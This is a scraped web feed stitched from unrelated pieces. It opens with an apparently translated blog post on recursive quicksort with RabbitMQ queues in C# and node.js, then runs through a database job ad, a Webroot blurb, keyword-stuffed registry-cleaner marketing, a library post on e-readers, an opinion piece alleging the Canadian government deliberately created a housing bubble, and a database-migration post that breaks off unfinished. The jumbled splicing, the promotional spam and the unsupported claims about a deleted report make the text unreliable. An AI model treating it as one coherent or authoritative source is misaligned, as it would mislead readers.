    Let's be honest: this technique has incredible potential, but it also has the classic charm of a demo in front of customers: beautiful as long as it stays simple. Raise the bar even slightly and you will discover that just going from one queue to several queues in an application makes everything terribly confusing and hard to manage. Looking at the code of Example5A you can see that, to keep it as short as possible, I left everything in a single thread rather than in an optimal form, which does not help comprehension; for better performance, separate threads for requests and replies would be advisable, as would proper handling of multiple queues. My advice is to encapsulate all these functions, as I tried to do in the final example found in the solution under the name "QuickSortRabbitMQ". Quicksort? Where did we talk about that before? Of course: at the beginning of this post. That is where this whole discussion started, taking us from the distribution of processes all the way to the use of a message broker. Even if only for teaching purposes, imagine creating a micro service that sorts an array of integers. As we saw, quicksort splits the array into two sub-arrays around a pivot value. What if we fed those two sub-arrays back to the same micro service, and so on, until the array is sorted? The micro service will wait, thanks to RabbitMQ, for a request addressed to it, or rather to the queue from which it takes the array to sort. It will then have a second, private queue, where it waits for the sorted versions of the arrays that it itself sent to the main queue. Messy, right? Yes: this is how to call micro services through a message broker recursively, and recursion is exactly what quicksort needs.

    To explain with an example: given this array to sort, we send it to the public queue of our sorting micro service:

    [4,8,2,6] -> Public queue

    On the first pass, our micro service might split the array into two sub-arrays with pivot 5, which are in turn sent to the public queue:

    [4, 2] -> Public queue
    [8, 6] -> Public queue

    Now the same micro service will be called twice; it will sort the two numbers it receives and must return them... yes, but to whom? Simple: to itself... And how? We could use the public queue again, but that brings a far from trivial problem. If you recall the quicksort algorithm, the same method waits for the two arrays it sent, now sorted, and must then return their union to its own caller. So we must keep track of the two arrays we sent so they can be merged: and how could we do that if this micro service had several active instances, with one array ending up in a process on machine A and the second in a process on machine B? The process that sends the request MUST BE the one that receives the replies, and we can achieve that only by creating a private queue in the same process and, through the message properties, routing the reply to the correct queue.

    [2,4] -> Private queue of the calling process
    [6,8] -> Private queue of the calling process

    The calling process will also wait on the private queue for both replies, merge them, and then return the result to its own caller, which may again be itself or another process.
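The split/merge bookkeeping just described can be simulated without a broker. The following single-threaded Python sketch is illustrative only: plain queues stand in for the RabbitMQ public and private queues, and a dictionary keyed by a correlation id plays the role the article's RequestSubmited cache plays. All names are made up for the sketch.

```python
import queue
import uuid

# public_q carries (message_id, reply_to_name, array) requests;
# private_qs maps a queue name to the queue where replies for it land;
# pending maps a child correlation id to its slot and shared merge state.
public_q = queue.Queue()
private_qs = {}
pending = {}

def new_private_queue():
    name = str(uuid.uuid4())
    private_qs[name] = queue.Queue()
    return name

service_private = new_private_queue()  # where the service awaits child results

def handle_public(msg_id, reply_to, arr):
    # arrays of one element or fewer are already sorted: reply immediately
    if len(arr) <= 1:
        private_qs[reply_to].put((msg_id, arr))
        return
    pivot, rest = arr[0], arr[1:]
    less = [x for x in rest if x < pivot]
    greater = [x for x in rest if x >= pivot]
    state = {"parent_id": msg_id, "reply_to": reply_to,
             "pivot": pivot, "got": {}}
    for slot, part in (("less", less), ("greater", greater)):
        child_id = str(uuid.uuid4())
        pending[child_id] = (slot, state)
        public_q.put((child_id, service_private, part))

def handle_private(msg_id, sorted_part):
    slot, state = pending.pop(msg_id)
    state["got"][slot] = sorted_part
    if len(state["got"]) == 2:  # both halves arrived: merge and reply upward
        merged = state["got"]["less"] + [state["pivot"]] + state["got"]["greater"]
        private_qs[state["reply_to"]].put((state["parent_id"], merged))

result_queue = new_private_queue()  # final destination of the sorted array
public_q.put((str(uuid.uuid4()), result_queue, [4, 8, 2, 6]))

# single-threaded loop standing in for the broker's dispatching
while not public_q.empty() or not private_qs[service_private].empty():
    if not public_q.empty():
        handle_public(*public_q.get())
    else:
        handle_private(*private_qs[service_private].get())

_, final = private_qs[result_queue].get()
print(final)
```

Because every child request carries its own correlation id, it does not matter which instance, on which machine, sorts a given slice: the merge always happens where the pending entry lives.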

    You can already imagine the complexity of writing code that manages this mess across multiple threads. To simplify things I created a small library that autonomously creates the threads it needs and, through events, delivers the messages coming from the message broker to the process. In the sample solution it is the "RabbitMQHelperClass" project. This library is used by the "QuickSortRabbitMQ" project. We have reached our destination: here is the console application that uses the message broker to exchange the "slices" of the array to be sorted with quicksort. The first part is simple: after creating an array of 100 elements populated with random integers from 1 to 100, the class that makes our job easier (or at least tries to) is instantiated.

    using (rh = new RabbitHelper("localhost"))
    {
        rh.AddPublicQueue(queueName, exchangeName, routingKey, false);
        var privateQueueThread = rh.AddPrivateQueue(); // "QueueRicorsiva"
        privateQueueName = privateQueueThread.QueueInternalName;

    Here we see the function that creates the public queue (to which the requests for arrays to sort will be sent). Then a private queue is created; it will be used to return the sorted array to the caller.

    var privateQueueResultThread = rh.AddPrivateQueue(); // "QueueFinale"
    privateQueueNameResult = privateQueueResultThread.QueueInternalName;

    Here one more private queue is created: it will hold the final result at the end of the recursive cycle (unlike the public queue, which is unique, there can be more than one private queue). Time to wire up the events:

    string messageId = RabbitHelper.GetRandomMessageId();
    rh.OnReceivedPublicMessage += Rh_OnReceivedPublicMessage;
    privateQueueThread.OnReceivedPrivateMessage += Rh_OnReceivedPrivateMessage;
    privateQueueResultThread.OnReceivedPrivateMessage += Rh_OnReceivedPrivateMessageResult;

    messageId holds a random, unique GUID. OnReceivedPublicMessage is the event fired when a message arrives on the public queue created above; the same applies to the two private queues with OnReceivedPrivateMessage. Time to start our sorting procedure:

    var msgRaw = RabbitHelper.ObjectToByteArray<List<int>>(arrayToSort);
    rh.SendMessageToPublicQueue(msgRaw, messageId, privateQueueNameResult);

    As seen before, everything transmitted via RabbitMQ is serialized as a byte array. The ObjectToByteArray function performs this operation (more on it later), and SendMessageToPublicQueue sends the array to be sorted to the public queue, together with the name of the private queue that will wait for the final reply with the completed sort. Now the class that created the queue-processing threads on our behalf receives the message and forwards its content, along with other information, to the "OnReceivedPublicMessage" event defined above. Here the sorting function seen at the beginning of this post has been rewritten:

    private static void Rh_OnReceivedPublicMessage(object sender, RabbitMQEventArgs e)
    {
        string messageId = e.MessageId;
        string queueFrom = e.QueueName;
        var toOrder = RabbitHelper.ByteArrayToObject<List<int>>(e.MessageContent);
        Console.Write(" " + toOrder.Count.ToString());
        if (toOrder.Count <= 1)
        {
            var msgRaw = RabbitHelper.ObjectToByteArray<List<int>>(toOrder);
            rh.SendMessageToPrivateQueue(msgRaw, messageId, queueFrom);
            return;
        }

    Given the array content, plus the accompanying information (the unique message id and the queue to reply to), we check that its size is greater than one; otherwise the same array that was received is sent back as the reply to the private queue. The rest of the code splits the array elements around the pivot value into smaller and larger parts, and sends these two arrays to the public queue:

    var rs = new RequestSubmited
    {
        MessageParentId = messageId,
        MessageId = RabbitHelper.GetRandomMessageId(),
        QueueFrom = queueFrom,
        PivotValue = pivot_value
    };
    lock (requestCache)
    {
        requestCache.Add(rs);
    }
    var msgRaw1 = RabbitHelper.ObjectToByteArray<List<int>>(less);
    rh.SendMessageToPublicQueue(msgRaw1, rs.MessageId, privateQueueName);
    var msgRaw2 = RabbitHelper.ObjectToByteArray<List<int>>(greater);
    rh.SendMessageToPublicQueue(msgRaw2, rs.MessageId, privateQueueName);

    RequestSubmited is a class containing only the properties needed to identify the reply sent back, through the message broker, by another (or the same) process.

    Only when the arrays have been reduced to a single element is everything sent to the private queue handled by Rh_OnReceivedPrivateMessage. This event must be invoked twice, once for each of the two array parts split by the pivot value. The first part of this function simply waits for both halves to arrive before they are merged. The RequestSubmited object is used to retrieve the message id and the pivot value:

    private static void Rh_OnReceivedPrivateMessage(object sender, RabbitMQEventArgs e)
    {
        string messageId = e.MessageId;
        string queueFrom = e.QueueName;
        // ... code to collect both halves ...
        // finally the sorted array is sent to the private queue
        var msgRaw = RabbitHelper.ObjectToByteArray<List<int>>(result);
        rh.SendMessageToPrivateQueue(msgRaw, messageParentId, queueParent);
    }

    I will not dwell on the code that performs the sort (already seen) or that retrieves the two halves (a trivial check on a List<...> object); the source code is easy to consult and test. Let's look at the final result, though:

    The nice part is that we can start this process several times to sort in parallel across multiple processes, even on different machines:

    The window below shows only one piece of debug information: the number of elements sent.

    If there were a prize for complicating a procedure that is simple by nature, after this last bit of code I could compete for first place without any trouble. Indeed, this quicksort example has a serious problem standing between it and profitable distributed computing: the portions of the array to be sorted must be transmitted in full when, by passing only references to the array to sort, everything would work out much faster. But this is the example that came to mind...

    Let's start drawing some conclusions. The simplest is that I need to work on better examples; the second is that the message broker (RabbitMQ in this case) really does its job very well if we decide to embrace the world of micro services. Going back to the cube, we can make processes communicate along any axis quickly and reliably. We can also make inter-process communication easier for propagating configuration changes. Think back to the earlier example where we used fanout communication (no filters, delivered to every queue bound to that exchange), and now picture a multitude of micro services running on one or more servers. By default each could have its own configuration file read at startup: but what happens if one of those parameters must change? For instance, every process might be configured with the name of an FTP server where files are to be uploaded. If the URI of that server changes, what do we do? Edit the configuration files of every process? And what if we forget one? A more practical solution could be a micro service dedicated to exactly this: every process, once started, would read the default configuration file stored next to the executable and then ask that micro service for the current configuration (which could override the previous one). Alternatively, each micro service could have a private queue bound to an exchange through which configuration changes are pushed in real time. This approach would even let us send out the new URI for the FTP server, wait until every process has updated itself, and then shut down the old server, confident that nobody is still using it.
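The fanout configuration idea can be illustrated in a few lines. This hypothetical, broker-free Python sketch uses a list of bound queues in place of a RabbitMQ fanout exchange; all names are illustrative:

```python
import queue

# Each service binds its own private queue to a "config exchange";
# publishing a change delivers a copy to every bound queue
# (no routing key, no filter), mimicking a fanout exchange.

class ConfigExchange:
    def __init__(self):
        self.queues = []

    def bind(self):
        q = queue.Queue()
        self.queues.append(q)
        return q

    def publish(self, update):
        for q in self.queues:  # fanout: every subscriber gets its own copy
            q.put(update)

exchange = ConfigExchange()
svc_a = exchange.bind()
svc_b = exchange.bind()

# push the new FTP URI to all running services at once
exchange.publish({"ftp_uri": "ftp://new-server.example"})

config_a = svc_a.get()
config_b = svc_b.get()
print(config_a, config_b)
```

Every service drains its own queue at its own pace, which is exactly why the old server can be retired only after all subscribers have confirmed the update.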

    To repeat ourselves: we can write a myriad of micro services for the most disparate operations, from accessing a database table, to sending email, to producing charts; each service reachable through an exchange and, as demand grows, able to have more processes attached, letting the message broker balance the load across all available resources. And interoperability? The message broker does not care who or what calls it. It could be a client written with the .Net Framework as in this post, or Java... In that case, how do we exchange objects more complex than the strings used in the first examples, when, as in the quicksort example, we are sending serialized objects native to one particular technology?

    Let's see what happens. In Esempio6A we try exactly that: first we create a simple object to serialize, such as an array of integers:

    var content = new int[] { 1, 2, 3, 4 };

    Then we send it to RabbitMQ with the code we already know:

    IBasicProperties basicProperties = ModelCentralized.CreateBasicProperties();
    var msgRaw = ObjectToByteArray(content);
    ModelCentralized.BasicPublish("", QueueName, basicProperties, msgRaw);

    ObjectToByteArray is a function also used by the quicksort example:

    public static byte[] ObjectToByteArray<T>(T obj) where T : class
    {
        BinaryFormatter bf = new BinaryFormatter();
        using (var ms = new MemoryStream())
        {
            bf.Serialize(ms, obj);
            return ms.ToArray();
        }
    }

    Now all that remains is to see what happens when, having put this object into a queue, we read it with another technology. Let's try node.js (I confess that my interest in message brokers was born with this technology, and only later did I "convert" it to the .Net Framework world). With npm and nodejs installed on your machine, from a terminal just install the package:

    npm install amqp

    Then, in a text editor:

    var amqp = require('amqp');
    var connection = amqp.createConnection({ host: 'localhost' });

    // Wait for connection to become established.
    connection.on('ready', function () {
        // Use the default 'amq.topic' exchange
        connection.queue('Example6', function (q) {
            // Catch all messages
            q.bind('#');
            // Receive messages
            q.subscribe(function (message) {
                // Print messages to stdout
                console.log(message.data.toString());
            });
        });
    });

    NodeJs makes all of this trivial thanks to its asynchronous nature. Once connected to the RabbitMQ server on localhost, the ready event fires, we attach to the "Example6" queue (the same queue used in Esempio6A) and, with subscribe, wait for the messages. Let's launch this mini app:

    node example1.js

    Then we start Esempio6A.exe:

    Obviously, NodeJs has no idea what to do with that incomprehensible byte array. The solution? I do not know which approach is the fastest or best, but the simplest, and the most reusable across any technology, is json. We can transform the sending code seen above like this:

    var json = new JavaScriptSerializer().Serialize(content);
    msgRaw = Encoding.Default.GetBytes(json);
    ModelCentralized.BasicPublish("", QueueName, basicProperties, msgRaw);

    Once it is placed in the queue and read by the nodejs app, we get:

    Perfect: using json from nodejs is trivial, and the same is true with the .Net Framework, since just as we can serialize an object to json, we can also turn it back into its original form. Are there better solutions? As always, I am open to any advice.
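The json interchange just described is easy to demonstrate in any language. Here is a minimal Python sketch of the same round trip (the names are illustrative; the C# side of the post does the producing step with JavaScriptSerializer):

```python
import json

# Producer side: turn a native object into json bytes, which is what
# would be published to the queue. Consumer side: turn the bytes back
# into the consumer's own native types, regardless of technology.

content = [1, 2, 3, 4]
msg_raw = json.dumps(content).encode("utf-8")   # bytes on the wire

decoded = json.loads(msg_raw.decode("utf-8"))   # what the consumer rebuilds
print(decoded)
```

Unlike the BinaryFormatter byte array, these bytes are just text, so any client that can parse json (node.js, Java, .Net, ...) reconstructs the same values.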

    Time to wrap up. Conclusions? There are none. A message broker simplifies the structure of apps based on micro services. Is it the only choice? No. I would have liked to continue this discussion with micro service communication over Redis, by the Italian Salvatore Sanfilippo, but my knowledge there is still lacking and I immediately ran into problems I have not yet solved (free time is what it is). One advantage I noticed right away compared with RabbitMQ is its dramatically higher speed. Perhaps I will cover the topic on this blog in the future... if, again, time and motivation allow. Another option is Akka.Net: here too performance is higher and message passing is more streamlined; the big problem I ran into immediately is the difficult interoperability between different technologies, and my novice-level knowledge did not take me beyond the basics. Ok, that's enough.

    All the sample code is available here:



    Continue reading Divide et impera con c# e un message broker.

    (C) 2017 ASPItalia.com Network - All rights reserved

              Oracle Database Administrator   
    TX-Dallas, Mastech Digital provides digital and mainstream technology staff as well as Digital Transformation Services for leading American Corporations. We are currently seeking an Oracle Database Administrator for our client in the Energy/Utilities domain. We value our professionals, providing comprehensive benefits, exciting challenges, and the opportunity for growth. This is a Contract position and the c
              Caching in – adventures in Oracle Tuning   
    Given the job of tuning a problem statement, I’ll usually try to work on it on a lightly used database. More importantly, where practical, I’ll execute the statement twice, one after the other, and use the response time for the … Continue reading
              Putting web threat protection and content filtering in the cloud   

    Webroot compares deploying secure web gateways as software or appliances on-premises vs. as a cloud-based service. Lower cost, fast implementation, rapid scalability and less administration are all good reasons to adopt SaaS and cloud-based applications. In addition to these benefits, cloud-based secure web gateways can also provide better security and faster performance than appliances or local servers. The paper discusses a number of advantages of cloud-based solutions that appliances cannot match, such as:

    - Better defense against zero-day threats and spam servers

    - More comprehensive signature and URL database

    - Supports remote users more securely and without the cost of putting servers in every location

              Registry Clean Expert   
    The Windows registry is a database repository for information about a computer's configuration. The registry keeps growing as you use Windows, attracting obsolete and unnecessary information and gradually becoming cluttered and fragmented. As the registry grows, it can degrade the performance of the whole system and cause many strange software problems. Feature highlights include:
    - Scan the Windows registry and find incorrect or obsolete information.
    - Fix the obsolete information in the Windows registry with this Registry Cleaner and boost your Windows performance.
    - Make backups of the Windows registry.
    - Restore the Windows registry from a previous backup.
    - Manage the programs started when Windows starts up with the Startup Organizer.
    - Manage the IE BHOs with the BHO organizer.
    - Remove spyware, adware and trojans hidden in your startup items and BHOs.
    - Registry compact and registry defrag.
    - Built-in tracks eraser for privacy protection.
    - A user-friendly interface makes it easy for anyone to use Registry Clean Expert.
    Tag: Registry Clean Registry Cleaner Registry Optimizer Registry Tweak Registry Fix Registry Repair Registry Drill Registry Defrag Registry Washer Registry Shower Reg Organizer Reg Cleaner RegSeeker Startup Organizer Registry Clean Software Registry Clean XP
              RESOURCES CLERK - Ministry of Natural Resources and Forestry - Fort Frances, ON   
    Demonstrated proficiency with computers and software programs such as word-processing, database, electronic mail, internet, spreadsheet and financial and... $22.76 - $26.46 an hour
    From Ontario Public Service - Fri, 16 Jun 2017 21:25:36 GMT - View all Fort Frances, ON jobs
              Moodle Site Policy Manager   
    BUY THIS ITEM Moodle Site Manager is a local Moodle plugin to create/edit a site policy in Moodle using the WYSIWYG editor (i.e rich text) and save it to the database. The site policy can then be displayed and used as the site policy URL in the Moodle site configuration.
              Windows Vista: Kernel Changes - Kernel Transactions   

    Originally posted on: http://geekswithblogs.net/sdorman/archive/2006/06/18/82249.aspx

    Kernel Transaction Manager (KTM)

    Before Vista, applications had to do a lot of hard work to recover from errors during the modification of files and registry keys. Windows Vista implements a generalized transaction manager called the Kernel Transaction Manager (KTM) which provides “all or nothing” transaction semantics. This means that changes are committed only when the associated transaction is completed and commits.
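The "all or nothing" idea can be illustrated without the KTM itself. The following Python sketch (a hypothetical FileTransaction class, not the Windows API) stages a file change invisibly and makes it visible atomically only at commit:

```python
import os
import tempfile

# Illustrative sketch only: changes are staged in a temporary file and
# become visible in a single atomic step at commit; a rollback leaves
# the original file untouched.

class FileTransaction:
    def __init__(self, path):
        self.path = path
        self.tmp = None

    def write(self, data):
        # stage the new content in a temporary file next to the target
        fd, self.tmp = tempfile.mkstemp(dir=os.path.dirname(self.path) or ".")
        with os.fdopen(fd, "w") as f:
            f.write(data)

    def commit(self):
        os.replace(self.tmp, self.path)  # atomic rename: the "commit"

    def rollback(self):
        os.remove(self.tmp)              # discard the staged change

target = os.path.join(tempfile.gettempdir(), "ktm_sketch.txt")
tx = FileTransaction(target)
tx.write("new contents")
tx.commit()
with open(target) as f:
    committed = f.read()
```

A crash before commit leaves only an orphaned temporary file; the target is either fully old or fully new, never half-written, which is the guarantee the KTM generalizes across files and registry keys.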

    The KTM is extensible through third-party resource managers and coordinates between the transaction clients (the applications) and the resource managers.

    The registry and NTFS have been enhanced to provide transaction semantics across all their operations; these facilities are used by the Windows Update service and the System Protection services.

    Vista also picks up the Common Log File System (Clfs.sys) introduced in Windows Server 2003 R2, which provides efficient transaction logging facilities.

    Transaction APIs

    Transactions can span modification across one or many registry keys, files, and volumes. By using the Distributed Transaction Coordinator (DTC) transactions can coordinate changes across files, registry, databases, and MSMQ.

    Transactions are relatively easy to use in Vista with the introduction of the new transaction command, which allows scripts to participate in the transaction process.

    The Windows API also has a new set of API functions:

    • CreateTransaction
    • SetCurrentTransaction
    • CommitTransaction
    • RollbackTransaction

    The kernel has IoCreateFile, which now takes an ExtraCreateParameters argument that specifies the transaction handle.

              E-book Readers, and their accoutrements   
    Now that you have turned off the outside tap, and are huddled inside watching the mums wither, you can feel bad about not having your holiday decorations up. I'm kidding--I am of the school that says that one should not flick a switch on a colored light until the last Day After Thanksgiving sandwich has been consumed.

    I am not a traditionalist, however, when it comes to e-books. People ask me about e-books all the time, and more often than not, they preface it by apologizing. Please, stop it. I may be a librarian, but I do not worship at the altar of the printed word. These days, if I added up the time each day that I spend reading from a glowing screen, or listening to audio-books, it would far surpass the time I spend staring at a piece of paper.

    Yes, I grew up with books, magazines, and two daily newspapers (morning and afternoon--really). When I went to Library School we learned how to type catalog cards, but after I graduated, I created a database that printed the information for me in card format--until a grant came along to buy an automated system. Goodbye, card catalog...

    Many librarians love technology. We jump on the technology bandwagon too quickly sometimes--microfiche, anyone? Second Life? I wasted an afternoon a couple of years ago, listening to a Second Life enthusiast describing how we would all be running our libraries on Second Life any minute. I wonder what he's promoting now...

    The first e-book reader I saw was a RocketBook--this was in 2000 or so. It was clunky, and being circulated in a public library. Oh, yes, in 2000. We were told that they would be replacing books any minute, and here we are in 2010, and still waiting to see which e-book reader will become the standard format. Kindle, Nook, Sony Reader, iPad?

    A lot of people I know receive them as gifts, so I expect to see more in a few months from now. If you are thinking of getting one, or if someone wants to give you one, the Upper Hudson Library System does have e-books that you can load onto your reader. Please go to this page to find out which readers you can use with our collection.

    If you'd like to see what titles are available in digital format (audio and e-books, and yes, some video), go to this page. Come in to the library, if you like, and ask me about it. And don't apologize. You're reading. Reading is good. I approve.

    PS If you think you know an e-book reader who would like a knitted cozy to protect the gadget, here's a link to a pattern for a knitted e-book reader.
              L3 Ops - Database Operations - Morgan Stanley - New York, NY   
    Greenplum Database Design. Greenplum performance monitoring and troubleshooting. Team is responsible for providing day to day Greenplum DBA support for MSWM and...
    From Morgan Stanley - Tue, 27 Jun 2017 18:14:07 GMT - View all New York, NY jobs
              Database Administrator / Architect - Morgan Stanley - New York, NY   
    O Candidate should be highly experience with SQL and working with warehouse specific database technologies like Teradata, Greenplum and DB2-UDB....
    From Morgan Stanley - Fri, 09 Jun 2017 20:57:33 GMT - View all New York, NY jobs
              Senior Systems Engineer/ Big Data - Dell - Remote   
    Greenplum, MPP databases, Data Lake strategy, heterogeneous data management, BI/DW, visualization etc). 5+ years of experience with deep understanding in...
    From Dell - Wed, 03 May 2017 23:31:25 GMT - View all Remote jobs
              Senior Systems Engineer/ Big Data - Virtustream Inc. - United States   
    Greenplum, MPP databases, Data Lake strategy, heterogeneous data management, BI/DW, visualization etc). 5+ years of experience with deep understanding in...
    From Virtustream Inc. - Wed, 03 May 2017 20:56:37 GMT - View all United States jobs
              Wed Feb 1st Post #2: Did you know the Housing Bubble in North America was deliberately created by the Feds?   

    Since we are returning, we thought we'd throw up a few posts reviewing how we got to where we are with our Canadian Housing Bubble.

    With all the intense press attention on our housing bubble over the last year or so, China has become the scapegoat for all our housing woes.  And while the world is awash in Chinese money today, it's important to acknowledge the home grown roots of our problem.

    And to understand that... it's crucial to recall how the CMHC was specifically instructed by the Harper Conservatives to create our housing bubble.

    "Say what?", you exclaim!

    It's true.  What is even more astonishing is that the United States also deliberately created their housing bubble too.

    Both nation's predicaments were deliberately crafted.

    After the dot com crash of 1999 and the 2001 terrorist attacks, America had a choice of entering a painful recession (which critics say was desperately needed to correct the imbalance of excessive monetary stimulus in the 1990s) or politicians could kick the can down the road and artificially inflate the economy.

    Economist Paul Krugman, writing in the New York Times on August 2, 2002,  identified the problem:
    The basic point is that the recession of 2001 wasn't a typical postwar slump, brought on when an inflation-fighting Fed raises interest rates and easily ended by a snapback in housing and consumer spending when the Fed brings rates back down again. 
    This was a prewar-style recession, a morning after brought on by irrational exuberance. 
    To fight this recession the Fed needs more than a snapback; it needs soaring household spending to offset moribund business investment. And to do that, as Paul McCulley of Pimco put it, Alan Greenspan needs to create a housing bubble to replace the Nasdaq bubble.
    Yes... you read that correctly. To offset a morbid economy, leading economists were recommending that the US Government and the US Federal Reserve create a housing bubble so that consumers could use that 'sense of wealth' to drive the economy with consumer spending.

    The creation of a housing bubble was a deliberate economic stimulus move.

    And Canada followed America's lead on this.

    In America, from 2002-2008, President George W. Bush almost singlehandedly, through cheap rates, lax regulation, government housing subsidies, presidential boosterism and financial engineering, managed to get the home ownership rate to 70%.

    Following the lead of Republicans in the US, the Canadian Government saw the success of this plan and began pumping the Ownership Society as well. Gifts, incentives and inducements were showered on home buyers and the result was demand swelled, prices popped and a bubble was born.

    The main vehicle for these inducements was the CMHC, or the Canadian Mortgage and Housing Corporation. Founded after World War II to provide housing for returning soldiers, the CMHC's role has grown dramatically over the following 70 years. A Crown corporation owned by the Government of Canada, its main function today is providing insurance for residential mortgage loans to Canadian home buyers. (Note: This insurance isn't for the Canadian who buys a home; rather, it protects mortgage lenders against mortgage defaults by home buyers on mortgages with less than 20% down.)

    Here's how CMHC and mortgages in Canada evolved in the 2000s:
    • Prior to 1999 you needed 10% for a mortgage and that mortgage had a maximum amortization of 25 years.  CMHC also had limits on how much you could buy with their insurance.
    • Just after 1999 CMHC lowered the down payment to 5% with price limits on how much they would insure depending on the area. Amortizations were still 25 years. There would be no price limit on what they would insure if 10% or more was put down.
    • By Sept. 2003 CMHC allowed 5% down on 25 yr amortizations but they removed all price ceiling limitations. Now any mortgage would be insured regardless of the value of home purchased. 
    • In March 2004 CMHC began allowing Flex-Down products which permitted the 5% down to be borrowed and 1.5% closing costs to be borrowed (essentially zero down, but 95% insured).
    • In March 2006 you had  0% down, 30 yr amortizations. This became 0% down, 35 yr amortizations later in the year.  Interest only payments were allowed for 10 years.
    • In November 2006 CMHC began allowing 0% down, 40 yr amortizations along with interest only payments for 10 years. 
    • Canadian banks ramped this up by allowing cash back offers of up to 7% if you took out a mortgage with them.  You could basically get paid to buy a house.
    • Not only were the rules surrounding the granting of money loosened, but CMHC's cap for granting mortgages grew from $100 Billion in 2006 to almost $600 Billion by 2014.
    Right there, in all those details, is where all the money originated to fund our housing bubble.

    Conservative Prime Minister Stephen Harper's government altered mortgage and tax rules to the point we had the zero down, forty year mortgage. They allowed Canadians to raid RRSP's for down payments. They created the Home Reno Tax Credit. They gave us the first-time buyer's closing cost gift and they instituted the infamous 'emergency interest rate' which has kept interest rates artificially low since 2009 - an astonishing 8 years! 

    Harper's Conservatives gave us more pro-real estate initiatives than Canadians had seen in the last quarter-century.

    But wait... there's more!

    The most astonishing element of all this was something that has been effectively buried. It is something that the mainstream Canadian media, even now that they have finally turned their attention to the chaos being created by all this malinvestment in Real Estate, are completely unaware of.

    Back in 2009 we profiled a series of excellent articles put out by Murray Dobbin. One of them, his 2009 article 'Why Canada's Housing Bubble Will Burst', garnered significant interest in the blogosphere. In that article he stated:
    • In an effort to prop up the real estate market in 2008 (when affordability nosedived), the Harper government directed the CMHC to approve as many high-risk borrowers as possible and to keep credit flowing. CMHC described these risky loans as "high ratio homeowner units approved to address less-served markets and/or to serve specific government priorities." The approval rate for these risky loans went from 33 per cent in 2007 to 42 per cent in 2008. By mid-2007, average equity as a share of home value was down to six per cent -- from 48 per cent in 2003. At the peak of the U.S. housing bubble, just before it burst, house prices were five times the average American income; in Canada today that ratio is 7.4:1 -- almost 50 per cent higher.
    That's a stunning statement. He's saying the Harper Government specifically directed the CMHC to approve risky loans in an attempt to keep the economy afloat and blow the Housing Bubble even bigger.

    Shortly after the article was written, this blog contacted Dobbin and asked him about the source for this comment.

    Dobbin stated he got the reference from a CMHC report which was freely available on the CMHC website.  

    Your dutiful scribes from this blog checked out the document and read it personally.  Unfortunately we did not download a copy (and if anyone out there did, we would love to know).

    Dobbin's statement was confirmed: CMHC stated in that document that they had been directed by the government to approve as many high-risk borrowers as possible.

    A few months later, when a curious reader asked us about the source for this quote, we went to the CMHC site to forward the link to the report.  It was then we noticed the report had been removed.   When we asked Dobbin about it, he also noted (with surprise) that the report was gone from the CMHC website.  Dobbin also had failed to download a copy.

    Dobbin's columns had obviously struck a nerve, and it appears CMHC was directed to remove the document from its website.

    Curiously, Wikipedia had incorporated Dobbin's information into its entry on the CMHC.

    Don't bother to look for it now, though. When we went to reference the page for our original post on this several years ago, we discovered that the Wikipedia CMHC page had undergone a significant sanitization.

    Gone was the notation about CMHC being directed by the Conservative Government to change policy to approve more high risk borrowers.  Also removed were all the statistics about the ballooning level of CMHC backed mortgages.

    In its place are bland descriptions of CMHC functions.

    At the top of the page is a warning bar.

    If anyone is interested what the Wiki page used to say, you can still find it at a website called 'the full wiki'. It contains the old information that the Wiki page used to hold. 

    In Slide #7 it states: "In 2008, Canadian home prices started to dip as affordability became the worst on record in many cities. CMHC publicly admitted that it was ordered to approve as many high risk borrowers as possible to prop up the housing market and keep credit flowing."

    That is a stunning acknowledgement.

    When the American housing bubble popped in 2008, the Conservatives bet heavily that they could shield our boom from the 2008 financial crisis. What they did added fuel to a powder keg, one which has since grown insanely large as other central banks (the US Fed and the People's Bank of China) have flooded the world with Quantitative Easing and excess credit.

    But make no mistake. The foundation of this massive bubble started at home - with the manipulation of CMHC policies.

    (Below are the screen shots of the original Wiki site on CMHC before it was sanitized)


    Email: village_whisperer@live.ca
    Click 'comments' below to contribute to this post.

    Please read disclaimer at bottom of blog.



              Production Database Migration   

    I thought I'd share my experience with moving a heavily used production database for a live website from one server to another this weekend.  The database in question is used to support AspAlliance.com, but since it has been around for a long time, and since getting additional databases has not always been easy or free, there are several other sites that rely on this same database.  Additionally, on AspAlliance.com there are a large number of individual ASP and ASP.NET applications, many of which store their connection string information locally.  I'm still not 100% done tracking down all the apps that need to be updated, but the important ones are done.

    Why The Move?

    The move was required for a few reasons, mainly centered around performance.  The site's old db server was a shared box that was housing several dozen clients for my host, OrcsWeb, and I was using about 90% of the resources of the server, so it was time for me to be politely asked to leave.  Also, my negotiations for hosting for 2004 netted me a dedicated database server, and moving to it would let me take advantage of its serious horsepower.


    I worked closely with Scott Forsyth of Orcsweb.  Scott is an AspInsider and general IIS and hosting guru.  He also is one of the few people that sleeps as little as I do (though I'm not sure that's by his choice), and he has always been a great aid for me whenever I screw up my sites.  We decided last week that the best time for the move would be late Friday/early Saturday, when traffic to the impacted websites would be minimal.  We pulled some baseline performance benchmarks for the destination server (which was already handling all of the mailing list data for AspAdvice.com) so that we would be able to see how much this new load would impact the server.  In the course of watching how the database performed on the shared server, we were able to observe, by Sql Server login, how many cpu cycles were used in a given time period.  Using this information led us to an idea: since this database is used by half a dozen different websites, including several busy ones, it would be useful to know which ones were responsible for varying amounts of the total load.

    Logging Performance By Username

    Since we needed to update connection strings for all of the sites anyway, we decided that instead of using the same connection string everywhere, we would set up logins for each site.  So we created logins like 'aspadvice.com', 'aspalliance.com', 'ads.aspalliance.com', etc.  After testing that Sql Server didn't mind the '.' in the names, we decided this would work.
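    For SQL Server of that era, setting up the per-site logins looked roughly like the sketch below. The login names match the ones mentioned above, but the database name and passwords are illustrative assumptions, not the actual values used:

```sql
-- Create one login per site so CPU and I/O usage can be attributed
-- to each application (SQL Server 2000-era syntax; later versions
-- use CREATE LOGIN / CREATE USER instead).
EXEC sp_addlogin @loginame = 'aspalliance.com', @passwd = 'str0ng-Passw0rd';
EXEC sp_addlogin @loginame = 'ads.aspalliance.com', @passwd = 'an0ther-Passw0rd';

-- Grant each login access to the shared database.
USE SharedSiteDb;  -- hypothetical database name
EXEC sp_grantdbaccess @loginame = 'aspalliance.com';
EXEC sp_grantdbaccess @loginame = 'ads.aspalliance.com';
```

    With distinct logins in place, the per-login CPU statistics make it easy to see which site is generating most of the load.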

    Flipping the Switch

